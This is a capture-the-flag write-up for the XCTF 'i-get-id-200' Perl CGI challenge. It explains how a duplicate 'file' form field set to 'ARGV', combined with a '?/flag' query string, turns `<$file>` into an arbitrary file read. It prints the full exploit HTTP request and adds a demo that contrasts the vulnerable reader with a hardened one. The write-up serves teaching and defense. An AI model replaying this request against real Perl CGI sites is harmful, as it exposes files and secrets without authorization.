  • XCTF-i-get-id-200

    i-get-id-200

    • Challenge description

      Hmm... I just set up a website.

    • Solution

      There are three pages in total:

      • Hello World

        Tells us the site is written in Perl.

      • Forms

        Entering a name and an age returns the rendered string.

        A quick search: SSTI does not apply to Perl.

      • File

        Files can be uploaded; after a successful upload the file's contents are printed.

        The upload looks like the place where the vulnerability is, but the Perl environment was unfamiliar to me, so I looked up the relevant usage.

      • Reading a file and printing its contents

        # open file.txt for reading; $fh is the filehandle used to read it
        open(my $fh, '<', 'file.txt') or die "cannot open file.txt: $!";
        while (<$fh>) {
           print "$_";
        }
        
      • File upload

         #!/usr/bin/perl
         use strict;
         use warnings;
         use CGI;

         my $cgi  = CGI->new;
         my $dir  = 'sub';
         # CGI.pm's upload handle; it stringifies to the client-side filename
         my $file = $cgi->param('file');
         # strip the remote path (either '\' or '/' separators) and keep the filename
         $file =~ m{^.*([\\/])(.*)};
         my $name = defined $2 ? $2 : "$file";
         open(my $local, '>', "$dir/$name") or print 'error';
         while (<$file>) {
            print $local $_;
         }
         print $cgi->header();
         print "$dir/$name";
         print "$file has been successfully uploaded... thank you.";
        

        I had no ideas, so I looked at writeups; the ones online all just guessed at the backend code...

        Found the source (excerpt):

        if ($cgi->upload('file')) {
            my $file = $cgi->param('file');
            while (<$file>) {
                print "$_";
                print "<br />";
            }
        }
        

        Several points are involved:

        • This relies on ARGV, the array Perl uses by default to receive command-line arguments (similar to Flask's request.argv). Under the CGI specification (RFC 3875, section 4.4) the web server passes a query string that contains no `=` to the script as command-line arguments, so `?/flag` puts `/flag` into @ARGV.
        • `$cgi->param('file');` returns the first `file` parameter, much like parameter pollution.
        • Combined, `<$file>` becomes `<ARGV>`, i.e. it reads ARGV[0]: Perl treats a plain string in `<$file>` as the name of a global filehandle, and the special ARGV handle reads the files named in @ARGV. That gives arbitrary file read.

        POST /cgi-bin/file.pl?/flag HTTP/1.1
        Host: 220.249.52.133:57967
        Content-Length: 411
        Cache-Control: max-age=0
        Origin: http://220.249.52.133:57967
        Upgrade-Insecure-Requests: 1
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAcRiYZHdukQ6xuzQ
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Referer: http://220.249.52.133:57967/cgi-bin/file.pl?file=../file.pl
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Connection: close
        
        ------WebKitFormBoundaryAcRiYZHdukQ6xuzQ
        Content-Disposition: form-data; name="file"
        Content-Type: text/plain
        
        ARGV
        ------WebKitFormBoundaryAcRiYZHdukQ6xuzQ
        Content-Disposition: form-data; name="file"; filename="draft.txt"
        Content-Type: text/plain
        
        asdasd
        ------WebKitFormBoundaryAcRiYZHdukQ6xuzQ
        Content-Disposition: form-data; name="Submit!"
        
        Submit!
        ------WebKitFormBoundaryAcRiYZHdukQ6xuzQ--
        
        

        Note that an extra set of form data is needed here to supply ARGV: the plain `file` field with the value `ARGV` comes before the real file part, so `param('file')` returns the string rather than the upload handle.
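The symbolic-filehandle pitfall described above, as an added example that is not from the original writeup or the challenge's own code: it places the vulnerable `while (<$file>)` pattern next to a hardened version that reads only from an already-open filehandle. The temporary files, their contents and the `read_lines_vulnerable` / `read_lines_safe` names are constructed for this demo, and @ARGV is set by hand to stand in for what the web server does under RFC 3875 section 4.4 with a query string that contains no `=`.

```perl
#!/usr/bin/perl
# Added demo, not the challenge's code: why `while (<$file>)` is dangerous
# when $file may be an attacker-supplied string, and how to refuse it.
use strict;
use warnings;
use Scalar::Util qw(openhandle);
use File::Temp   qw(tempfile);

# Constructed stand-in for the secret file the real challenge exposed.
my ($sfh, $secret_path) = tempfile();
print {$sfh} "SECRET{constructed-sample}\n";
close $sfh;

# Constructed stand-in for a genuine upload: CGI.pm hands the script an
# open filehandle for a multipart part that carries a filename.
my ($ufh, $upload_path) = tempfile();
print {$ufh} "uploaded line 1\nuploaded line 2\n";
close $ufh;

# Per RFC 3875 s.4.4 the web server passes a query string without '='
# to the CGI script as command-line arguments; emulate that by hand.
@ARGV = ($secret_path);

# Vulnerable pattern from the challenge: reads from whatever $file names.
# If $file holds the string "ARGV", <$file> is <ARGV>, i.e. every file in @ARGV.
sub read_lines_vulnerable {
    my ($file) = @_;
    my @lines;
    while (<$file>) { chomp; push @lines, $_ }
    return @lines;
}

# Hardened: accept only a reference to an open filehandle. With CGI.pm the
# equivalent is reading from $cgi->upload('file'), which is undef for a
# plain form field, rather than from $cgi->param('file').
sub read_lines_safe {
    my ($file) = @_;
    die "refusing to read: parameter is not an open filehandle\n"
        unless ref($file) && openhandle($file);
    my @lines;
    while (<$file>) { chomp; push @lines, $_ }
    return @lines;
}

open(my $upload, '<', $upload_path) or die "cannot open $upload_path: $!";

# 1. The vulnerable reader with a real upload handle behaves as intended.
print "vulnerable + upload handle : ", join(' | ', read_lines_vulnerable($upload)), "\n";

# 2. The same reader with the string "ARGV" leaks the secret file instead.
print "vulnerable + string 'ARGV' : ", join(' | ', read_lines_vulnerable('ARGV')), "\n";

# 3. The hardened reader still serves the real upload ...
seek($upload, 0, 0) or die "seek: $!";
print "safe + upload handle       : ", join(' | ', read_lines_safe($upload)), "\n";

# 4. ... and rejects the string before touching any file.
eval { read_lines_safe('ARGV'); 1 } or print "safe + string 'ARGV'       : $@";

close $upload;
unlink $secret_path, $upload_path;
```

The check in `read_lines_safe` works because a real CGI.pm upload is a reference to an open handle, while a plain form value is just a string; in a CGI script the simplest fix is to take the handle from `$cgi->upload('file')` and bail out when it is undef, instead of trusting `$cgi->param('file')`.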

    • References

  • Original address: https://www.cnblogs.com/R3col/p/13067053.html